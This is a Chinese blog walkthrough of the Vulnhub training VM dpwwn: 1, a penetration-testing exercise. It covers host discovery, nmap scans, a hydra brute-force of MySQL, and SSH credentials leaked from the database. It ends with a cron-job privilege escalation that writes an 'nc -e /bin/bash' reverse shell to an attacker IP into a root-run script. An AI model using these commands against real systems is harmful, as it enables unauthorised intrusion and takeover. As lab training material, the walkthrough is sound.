Vulnhub靶机:DPWWN: 1

最新推荐文章于 2024-02-07 10:07:59 发布
最新推荐文章于 2024-02-07 10:07:59 发布
阅读量175 收藏 1
点赞数
分类专栏: 靶机 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/132410038
版权

目录

介绍

系列:dpwwn(此系列共3台)
发布日期:2019 年 8 月 4 日
难度:初级
运行环境:VMware Workstation
目标:取得Root权限
学习:

  • 数据库空口令
  • 计划任务提权

靶机地址:https://www.vulnhub.com/entry/dpwwn-1,342/

信息收集

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

nmap -p- 192.168.229.143
nmap -p 22,80,3306 -A 192.168.229.143
nmap -p 22,80,3306 --script=vuln 192.168.229.143

image.png

连接数据库

fscan探测一下,直接发现了数据库空密码
image.png
如果想尝试爆破的话,也是可以的

gzip -d /usr/share/wordlists/rockyou.txt.gz
hydra -l root -P ./rockyou.txt 192.168.229.143 mysql -f -e nsr

image.png
简单搜寻后,发现疑似SSH账号密码:mistic/testP@$$swordmistic
image.png

SSH登录 & 提权

登录系统后,在当前目录下就看到了一个奇怪的sh文件,阅读其内容不由得想到可能涉及到计划任务。
image.png
果然发现了计划任务,每隔3分钟root就会执行一次,那就写入反弹shell的命令:

echo "nc -e /bin/bash 192.168.229.128 4455" > logrot.sh

image.png
image.png

lainwith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机dpwwn-01
timesleep的博客
10-17 341
扫描靶机IP 确定靶机IP为192.168.34.152,使用nmap扫描端口 看到靶机端口有ssh,http,mysql 首先查看http 看到http正在建设中,然后扫描一下目录 看到info.php但是对我们来说没有用然后测试一下mysq,尝试弱口令连接 果然mysql可以弱口令,密码为空然后查看一下有没有可用信息 找到了一个用户可以ssh连接接下来咱们连接 连接成功,咱们查看有...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub: dpwwn: 1靶机
qq_43884092的博客
05-31 181
mysql空密码,数据库泄露ssh用户名和密码,计划任务提权
[VulnHub靶机渗透] dpwwn: 1
最新发布
人若无名,便可专心练剑
02-07 1647
靶机精讲之dpwwn1,vulnhub靶机,很能体现思路为王的一台机器,艰难的撕口子过程全程展现,只希望你感同身受。直接告诉你怎么撕口子,你肯定觉得很简单,但就是这个方式,如果你偏偏想不到,那这台机器你难以为继。希望你借此机器,能够感同身受地思考你的渗透优先级选择和路径权衡。mysql空密码撕口子,自动任务提权。你能想到吗?少年!
vulnhub靶机dpwwn1
0of_blog
04-30 981
下载完后解压,然后用VMware打开dpwwn-01.vmx文件即可导入虚拟机。80端口没有更多收获,接下来把目光转向3306和ssh端口,尝试爆破账号密码。果然如此,规则是每3分钟,以root身份执行一次logrot.sh脚本。以上没有发现什么有用的信息,继续用nmap漏洞脚本扫描。目录下有一个sh脚本文件,考虑是否被计划任务调用了。发现ssh库中有个users表,看看表里面的数据。获得用户名和密码,尝试用这个账号去登录ssh。简单测试,Mysql账号为root,空密码。提权成功,至此,渗透结束。
vulnhub靶机dpwwn-01
weixin_52450702的博客
10-25 299
Vulnhub靶机dpwwn-01靶机下载地址:dpwwn: 1 ~ VulnHub靶机ip:192.168.70.137。
VulnHub系列』dpwwn: 1-Walkthrough
ins1ght的博客
11-03 595
靶机发布日期:2019年8月4日,难度:初级。MySQL未授权访问得到ssh登录凭证,发现root权限执行的计划任务,修改对应的任务脚本后获得root权限。
vulnhub靶机dpwwn渗透测试
Long_gone的博客
10-17 422
靶机打开后先扫描靶机IP: netdicover 经经验判断出靶机IP为:192.168.34.152,然后扫描一下靶机端口的开放情况: nmap -sV -A -p 0-65535 192.168.34.152 可以看见靶机开放了22,80和3306端口,我们先访问一下80端口: 在这个页面中并没有什么发现,然后目录爆破一下看看: dirb http://192.168.34.152 ...
VulnHub系列』dpwwn: 2-Walkthrough
ins1ght的博客
11-03 893
靶机发布日期:2019年8月8日,靶机难度:中等+。NFS共享配合LFI打了个getshell的组合拳,之后利用SUID权限的find命令配合chmod命令为/bin/bash赋予SUID权限成功提权。思路感觉还可以,有点骚气~
vulnhub-dpwwn03 通过教程
weixin_44155363的博客
01-03 309
最近在刷vulnhub靶场,偶然间做到了dpwwn系列的靶场,其中dpwwn03靶场提权用的是程序栈溢出的漏洞,相对常规方法还是比较少见的,所以拿出来单独在这里研究下。 链接地址: https://www.freebuf.com/articles/web/259673.html 文章题目:Linux通过栈溢出进行提权实战(dpwwn03) ...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
入坑 Hack The Box
LainWith的博客
10-19 9538
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
pikachu靶机学习记录
LainWith的博客
08-11 8390
前言:网上关于pikachu的教程很多,这篇博文最大的意义就是对思路的梳理,这也是“靶机”专栏的一贯特点暴力破解基于表单的暴力破解验证码绕过(on client)验证码绕过(on server)token防爆破? 暴力破解 基于表单的暴力破解 首先随意输入一个用户名和密码,Burpsuite抓包 发现没有验证码及其他限制,可以肆意爆破,由于左上角的提示按钮给出了答案,下面处于演示需求做一个简单爆破。 爆出一个账密:admin:123456 验证码绕过(on client) 首先明确两个概念:验证码一
vulnhub之DC9靶机
LainWith的博客
02-15 3377
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3125
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值